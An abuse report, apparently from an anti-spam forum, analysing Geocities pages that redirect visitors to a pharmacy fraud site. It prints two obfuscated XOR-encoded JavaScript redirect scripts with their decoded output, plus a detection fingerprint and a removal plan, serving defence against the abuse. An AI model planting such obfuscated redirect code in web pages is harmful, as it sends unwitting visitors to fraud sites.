Spam Alert
Full Report:  /Geocities_redirect_spam174335.html
Consumed following related reports:
[174336] http://geocities.com/dirkgill96/
Changed status to confirmed spam.Two examples of Yahoo Geocities redirections to a Canadian Pharmacy fraud site. This report contains
(1) and (2) the sample redirection scripts from the sites & the decoding of those scripts,
(3) the generic fingerprint that identifies these malicious redirections
(4) the method to rid Geocities of this huge infection which is occurring at an abuse rate of 800 per day, as seen at http://rss.uribl.com/hosters/geocities_com.html
(1) Sample redirection script for "dirkgill96"
var epoa='cqcxsnkyjlbtyfinwycuvgl';
var zxry=0;
var gzqsflk, rknmly, fiaknnc='5F02000A1A1E1F59060D0C130C070E0B4A5B291400063F00030A08074C550E0302061B0E481D0107570F1A1506180A1E0D561B1C0E1F4A51425311121D1E4D564C101715180B141B19101A451A0501454F45491A0D0510130148';
rknmly='';
var gzyw;
for( gzqsflk=0;
gzqsflk < fiaknnc.length;
gzqsflk+=2){gzyw = unescape( '%' + fiaknnc.substr( gzqsflk,2));
rknmly += String.fromCharCode( gzyw.charCodeAt(0) ^ epoa.charCodeAt(zxry++) );
if ( zxry >= epoa.length ) zxry = 0;
}document.write(rknmly);
Decodes to
<script language="JavaScript">window.top.location.href = 'http://earthexact.com';</script>
(2) Sample redirection script for "franciscopark37"
var punwiu='cqapugtvldb';
var zozdjs=0;
var tfbkr, yhwxje, lybn='5F0202021C17005600050C04040017105A563C0D120330121319051356481B0D0C071E165E01080458000B010205081F1B491C040902425E5146180113044C434B0702031518101F1515184A010C1C464B494807151E0D12174F';
yhwxje='';
var dtem;
for( tfbkr=0;
tfbkr < lybn.length;
tfbkr+=2){dtem = unescape( '%' + lybn.substr( tfbkr,2));
yhwxje += String.fromCharCode( dtem.charCodeAt(0) ^ punwiu.charCodeAt(zozdjs++) );
if ( zozdjs >= punwiu.length ) zozdjs = 0;
}document.write(yhwxje);
Decodes to
<script language="JavaScript">window.top.location.href = 'http://earthexact.com';</script>
(3) Generic fingerprint for redirection scripts starts with
var {TS}='{TSLONG}';var {TS}=0;var{TS}, {TS}, {TS}='{HEX}';{TS}='';var {TS};for( {TS}=0;{TS} < {TS}.length;{TS}+=2){{TS} = unescape( '%' + {TS}.substr( {TS},2));
where {TS} is a variable lower case text string of 3 - 9 characters
and {TSLONG} is a longer lower case text string 5 - 40 characters
and {HEX} is a long hexadecimal character string compring the set 0-9, A-F
(4) Using this generic fingerprint, scan every Geocities page, and remove every page that matches. Keep running the scan and removal until the abuse ceases. Monitor for changes in the fingerprint and adjust accordingly.
NOTE: This is a pervasive problem with serious consequences for Yahoo's reputation and integrity.
Escalate this issue immediately to the Corporate Security level for implementation. | Quote: | | http://geocities.com/franciscopark37/ |
|
Forum FAQ
Search
Usergroups
Profile
Login to check your private messages
Login
